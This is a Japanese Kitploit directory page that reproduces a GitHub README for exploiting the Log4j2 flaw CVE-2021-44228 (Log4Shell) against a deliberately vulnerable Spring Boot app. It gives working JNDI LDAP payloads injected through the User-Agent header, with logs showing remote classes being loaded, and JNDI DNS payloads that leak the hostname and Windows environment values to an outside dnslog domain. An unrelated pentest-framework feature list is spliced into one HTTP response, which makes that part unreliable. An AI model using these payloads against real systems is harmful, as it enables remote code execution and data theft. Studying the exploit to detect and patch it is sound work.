Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Log4j2-CVE-2021-44228 — CVE-2021-44228 Log4j2リモートコードインジェクションエクスプロイト。JNDIペイロード生成、WAFバイパス技術、ペネトレーションテストのための実践的な悪用ウォークスルーを備えています。 | Kitploit
ツール/GitHubGitHub/jas502n/log4j2-cve-2021-44228
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用WAFバイパスペネトレーションテスト学習と教育
GitHubjas502n/log4j2-cve-2021-44228

Log4j2-CVE-2021-44228

CVE-2021-44228 Log4j2リモートコードインジェクションエクスプロイト。JNDIペイロード生成、WAFバイパス技術、ペネトレーションテストのための実践的な悪用ウォークスルーを備えています。

リポジトリを見る
469118134年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-44228 Log4j におけるリモートコードインジェクション

https://twitter.com/jas502n/status/1468946197629272066

image

SpringBoot-pom.xml

デフォルト使用 :

<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-log4j2</artifactId>
</dependency>
`````` xml
<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-web</artifactId>
</dependency>

mvn dependency:tree```java [INFO] | | +- org.springframework.boot:spring-boot-starter-logging🫙2.6.1:compile [INFO] | | | +- ch.qos.logback:logback-classic🫙1.2.7:compile [INFO] | | | | - ch.qos.logback:logback-core🫙1.2.7:compile [INFO] | | | +- org.apache.logging.log4j:log4j-to-slf4j🫙2.14.1:compile [INFO] | | | - org.slf4j:jul-to-slf4j🫙1.7.32:compile
[INFO] | | - org.slf4j:slf4j-api🫙1.7.32:compile

pom.xml を変更```xml


<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-web</artifactId>
    <exclusions>
        <exclusion>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-logging</artifactId>
        </exclusion>
    </exclusions>
</dependency>

<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.14.1</version>
</dependency>

脆弱性環境の使用

usage: image``` $ java -jar log4jRCE-0.0.1-SNAPSHOT.jar

[*] CVE-2021-44228 Log4j2 Remote Code Injection

. ____ _ __ _ _ /\ / ' __ _ () __ __ _ \ \ \
( ( )_
_ | '_ | '| | ' / ` | \ \ \
\/ __)| |)| | | | | || (
| | ) ) ) ) ' || .__|| ||| |_, | / / / / =========||==============|/=//// :: Spring Boot :: (v2.6.1)

2021-12-10 16:18:43.099 WARN 48536 --- [ main] o.s.boot.StartupInfoLogger : InetAddress.getLocalHost().getHostName() took 5005 milliseconds to respond. Please verify your network configuration (macOS machines may need to add entries to /etc/hosts). 2021-12-10 16:18:48.108 INFO 48536 --- [ main] c.example.log4jrce.Log4jRceApplication : Starting Log4jRceApplication v0.0.1-SNAPSHOT using Java 1.8.0_60 on JMacBookPro.local with PID 48536 (/Users/jas502n/IdeaProjects/log4jRCE/target/log4jRCE-0.0.1-SNAPSHOT.jar started by root in log4jRCE/target) 2021-12-10 16:18:48.109 INFO 48536 --- [ main] c.example.log4jrce.Log4jRceApplication : No active profile set, falling back to default profiles: default 2021-12-10 16:18:48.890 INFO 48536 --- [ main] o.s.b.w.embedded.tomcat.TomcatWebServer : Tomcat initialized with port(s): 8080 (http) 2021-12-10 16:18:48.902 INFO 48536 --- [ main] o.apache.catalina.core.StandardService : Starting service [Tomcat] 2021-12-10 16:18:48.902 INFO 48536 --- [ main] org.apache.catalina.core.StandardEngine : Starting Servlet engine: [Apache Tomcat/9.0.55] 2021-12-10 16:18:48.957 INFO 48536 --- [ main] o.a.c.c.C.[Tomcat].[localhost].[/] : Initializing Spring embedded WebApplicationContext

#### Burpsuite Send
![image](https://assets.kitploit.com/production/public/readmes/27364/c8f80dfb5b50445abf55c366292513968c627410ab802b186adf16fa3aca6fa6.png)```
POST /login HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 52

data=xxxxx
  • ペネトレーションテストフレームワーク: コアスクリプトエンジン、自動オーケストレーター、レポート生成器で構成されます。
  • 脆弱性スキャンと評価: Nmap、Nessus、OpenVAS などのエンジンを統合し、結果の統合と優先順位付けをサポートします。
  • 自動エクスプロイト: Metasploit、Cobalt Strike などのツールの呼び出しと統合をサポートします。
  • レッドチームコラボレーション: チームコラボレーションパネル、タスク割り当て、リアルタイムコミュニケーション。
  • レポート生成: PDF、HTML、Word 形式をサポートし、スクリーンショット、ログ、証拠連鎖を含みます。``` HTTP/1.1 200 Content-Type: text/html;charset=UTF-8 Content-Length: 15 Date: Fri, 10 Dec 2021 08:38:50 GMT Connection: close

log4j2 success!

#### User-Agent Injection

![image](https://assets.kitploit.com/production/public/readmes/27364/eeedb546d688e4818c31ce602cf4a7adc2185b0c2c6358f94245d5a4f0d768a8.png)```bash
GET / HTTP/1.1
Host: 192.168.3.105:18080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)${jndi:ldap://192.168.3.105:1389/o=reference} AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.3.105:18080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

HTTP/1.1 200 
Content-Type: image/avif;charset=UTF-8
Content-Length: 26
Date: Tue, 14 Dec 2021 13:08:14 GMT
Connection: close

User-Agent Inject Success!

例: JDK jdk8-202

image

image

image```java User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)${jndi:ldap://192.168.3.105:1389/o=tomcat} AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36

2021-12-14 21:18:08.810 INFO 50619 --- [io-18080-exec-2] c.e.l.Log4jRceApplication : >>> Mozilla/5.0 (Windows NT 10.0; Win64; x64)javax.el.ELProcessor@7d97214f AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)${jndi:ldap://192.168.3.105:1389/o=groovy} AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36

2021-12-14 21:19:34.516 INFO 50619 --- [io-18080-exec-3] c.e.l.Log4jRceApplication : >>> Mozilla/5.0 (Windows NT 10.0; Win64; x64)groovy.lang.GroovyShell@383ad44e AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36

![image](https://assets.kitploit.com/production/public/readmes/27364/2a3d328707c5306328060f8e845b6f23ac7f6dce228cd7be927ffa6f9b7cbdf4.png)


### Fix log4j2 Tips By Default Properites

デフォルトの Map には **hostName** の値が事前に設定されており、その値は現在のシステムのホスト名または IP アドレスです。

参考ドキュメント:https://www.docs4dev.com/docs/zh/log4j2/2.x/all/manual-configuration.html

`org.apache.logging.log4j.core.LoggerContext#setConfiguration`

![image](https://assets.kitploit.com/production/public/readmes/27364/9fb94039e50269ee8eab64ca5aa55f4c49b49c3866f9e70c7a07f99e2d724ec7.png)
![image](https://assets.kitploit.com/production/public/readmes/27364/27d44e1476aa42e54c0ac15b81e22fa90368074182719725006e222da41a7019.png)```
${hostName}
${env:COMPUTERNAME}
${env:USERDOMAIN}
${env:LOGONSERVER}

例:``` // log4j2 Default,For(Windows、Linux、macOS....) ${jndi:dns://${hostName}.iwk5r1.dnslog.cn}

// Equivalent to windows command(set|findstr your-hostname) ${jndi:dns://${env:COMPUTERNAME}.iwk5r1.dnslog.cn} ${jndi:dns://${env:USERDOMAIN}.iwk5r1.dnslog.cn}

![image](https://assets.kitploit.com/production/public/readmes/27364/d5d12da6717eb79ff6a0e087da0f753f7db00fdba4d9f78206bba3a74ee1f30c.png)


### log4j 設定場所 (configLocation)

log4j: Log4j 設定プロパティ。

式 `${log4j:configLocation}` および `${log4j:configParentLocation}` は、それぞれ `log4j 設定ファイル` およびその`親フォルダー`の`絶対パス`を提供します。```
${log4j:configLocation}
ツールをダウンロード